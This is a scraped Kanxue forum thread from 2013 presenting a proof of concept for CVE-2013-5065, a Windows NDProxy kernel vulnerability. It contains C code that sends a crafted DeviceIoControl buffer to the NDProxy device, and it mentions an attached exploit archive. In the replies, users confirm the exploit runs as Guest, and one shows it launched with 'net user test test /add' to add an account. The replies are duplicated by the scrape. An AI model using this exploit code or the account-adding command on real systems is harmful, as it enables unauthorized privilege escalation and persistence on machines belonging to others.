[原创]CVE-2013-5065 PoC EXP及简要分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2013-5065 PoC EXP及简要分析

发表于: 2013-12-3 19:24 6136

[原创]CVE-2013-5065 PoC EXP及简要分析

uing

2013-12-3 19:24

6136

PoC:

#include <windows.h>
#include <stdio.h>
int main()
{
    HANDLE hDev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    if(hDev==INVALID_HANDLE_VALUE)
    {
        printf("CreateFile Error:%d\n",GetLastError());
    }
    DWORD InBuf[0x15] = {0};
    DWORD dwRetBytes  = 0;
    *(InBuf+5) = 0x7030125;
    *(InBuf+7) = 0x34;
    
    DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0);
    CloseHandle(hDev);
    
    return 0;
}

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

CVE-2013-5065.zip （27.14kb，131次下载）
QQ截图20131130235749.jpg （25.67kb，3次下载）
QQ截图20131201000037.jpg （16.57kb，2次下载）
QQ截图20131201000047.jpg （104.20kb，2次下载）
QQ截图20131201000610.jpg （58.11kb，10次下载）
QQ截图20131201004026.jpg （66.73kb，3次下载）
QQ截图20131201004440.jpg （26.85kb，2次下载）
QQ截图20131201005442.jpg （34.10kb，2次下载）
QQ图片20131202184725.jpg （18.10kb，2次下载）
QQ图片20131202184715.jpg （71.08kb，7次下载）
QQ截图20131202180217.jpg （86.19kb，23次下载）
跳转表.png （11.70kb，4次下载）

收藏・7

免费・5

支持

最新回复 (18)
kxzjchen 雪币： 190 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 15 回帖 470 粉丝 0 关注私信	kxzjchen 2 楼 007牛，顶你 2013-12-3 19:54 0
冰雪风谷雪币： 500 活跃值： (200) 能力值： ( LV13，RANK：270 ) 在线值：发帖 16 回帖 70 粉丝 2 关注私信	冰雪风谷 6 3 楼 Routing and Remote Access 额，试了半天，原来问题是这，擦。 2013-12-3 19:54 0
KooJiSung 雪币： 357 活跃值： (3418) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 4 楼速度真快 2013-12-3 20:52 0
ProgmBoy 雪币： 382 活跃值： (352) 能力值： ( LV2，RANK：140 ) 在线值：发帖 9 回帖 157 粉丝 5 关注私信	ProgmBoy 3 5 楼 binvul上已经回了。 guest下都可以跑。你的CreateFile方式不对 2013-12-3 21:29 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 6 楼感谢大牛指导, 已在Guest下测试成功; 再次感谢; 2013-12-3 22:07 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼楼主同学整理下帖子，一堆的图片，谁晓得你是讲啥子的，我这边给你加分也没有理由呀 2013-12-3 23:58 0
ycmint 雪币： 1149 活跃值： (888) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 8 楼 DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0); 除了0x24 是为了安排执行内存精心构造的，其他的几个都是为了逻辑跳转准备的，一直好奇 f87f1838这个Table,系统为啥是这样 ... 2013-12-4 11:37 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 9 楼 7爷手上有好多0day吖~ 2013-12-4 23:43 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 10 楼貌视可以写一个 kernel fuzz~ 2013-12-5 13:16 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 11 楼 exp代码都给你了, 党国大业就交给你了; 2013-12-5 23:05 0
isng 雪币： 26 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 1 回帖 19 粉丝 1 关注私信	isng 1 12 楼楼主分析不错，我也是前几天分析的，一直没注意到CreateFile的地方。。。纠结了半天 2013-12-6 15:08 0
tried 雪币： 31 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	tried 13 楼都是大牛啊 2013-12-6 15:28 0
kman 雪币： 155 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 338 粉丝 2 关注私信	kman 14 楼唉，根本都没明白这个漏洞的本质就来这里贴。。 2013-12-7 22:56 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 15 楼没想到win还有这种弱智漏洞 2013-12-8 14:52 0
KooJiSung 雪币： 357 活跃值： (3418) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 16 楼 ....... 2013-12-8 14:57 0
kman 雪币： 155 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 338 粉丝 2 关注私信	kman 17 楼理解了这个漏洞就能明白其实这个漏洞其实并不弱智，属于一个比较隐蔽的小失误，编程时稍微一马虎就可能出。 2013-12-8 22:08 0
游戏设计之神雪币： 181 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 6 粉丝 0 关注私信	游戏设计之神 18 楼 C:\>whoami whoami nt authority\network service C:\>CVE-2013-5065.exe net user test test /add CVE-2013-5065.exe net user test test /add open \\.\NDProxy fail 啥情况呀？ 2013-12-10 17:39 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 19 楼 =============== 2014-2-12 09:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

uing

发帖

160

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (18)
kxzjchen 雪币： 190 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 15 回帖 470 粉丝 0 关注私信	kxzjchen 2 楼 007牛，顶你 2013-12-3 19:54 0
冰雪风谷雪币： 500 活跃值： (200) 能力值： ( LV13，RANK：270 ) 在线值：发帖 16 回帖 70 粉丝 2 关注私信	冰雪风谷 6 3 楼 Routing and Remote Access 额，试了半天，原来问题是这，擦。 2013-12-3 19:54 0
KooJiSung 雪币： 357 活跃值： (3418) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 4 楼速度真快 2013-12-3 20:52 0
ProgmBoy 雪币： 382 活跃值： (352) 能力值： ( LV2，RANK：140 ) 在线值：发帖 9 回帖 157 粉丝 5 关注私信	ProgmBoy 3 5 楼 binvul上已经回了。 guest下都可以跑。你的CreateFile方式不对 2013-12-3 21:29 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 6 楼感谢大牛指导, 已在Guest下测试成功; 再次感谢; 2013-12-3 22:07 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼楼主同学整理下帖子，一堆的图片，谁晓得你是讲啥子的，我这边给你加分也没有理由呀 2013-12-3 23:58 0
ycmint 雪币： 1149 活跃值： (888) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 8 楼 DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0); 除了0x24 是为了安排执行内存精心构造的，其他的几个都是为了逻辑跳转准备的，一直好奇 f87f1838这个Table,系统为啥是这样 ... 2013-12-4 11:37 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 9 楼 7爷手上有好多0day吖~ 2013-12-4 23:43 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 10 楼貌视可以写一个 kernel fuzz~ 2013-12-5 13:16 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 11 楼 exp代码都给你了, 党国大业就交给你了; 2013-12-5 23:05 0
isng 雪币： 26 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 1 回帖 19 粉丝 1 关注私信	isng 1 12 楼楼主分析不错，我也是前几天分析的，一直没注意到CreateFile的地方。。。纠结了半天 2013-12-6 15:08 0
tried 雪币： 31 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	tried 13 楼都是大牛啊 2013-12-6 15:28 0
kman 雪币： 155 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 338 粉丝 2 关注私信	kman 14 楼唉，根本都没明白这个漏洞的本质就来这里贴。。 2013-12-7 22:56 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 15 楼没想到win还有这种弱智漏洞 2013-12-8 14:52 0
KooJiSung 雪币： 357 活跃值： (3418) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 16 楼 ....... 2013-12-8 14:57 0
kman 雪币： 155 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 338 粉丝 2 关注私信	kman 17 楼理解了这个漏洞就能明白其实这个漏洞其实并不弱智，属于一个比较隐蔽的小失误，编程时稍微一马虎就可能出。 2013-12-8 22:08 0
游戏设计之神雪币： 181 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 6 粉丝 0 关注私信	游戏设计之神 18 楼 C:\>whoami whoami nt authority\network service C:\>CVE-2013-5065.exe net user test test /add CVE-2013-5065.exe net user test test /add open \\.\NDProxy fail 啥情况呀？ 2013-12-10 17:39 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 19 楼 =============== 2014-2-12 09:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复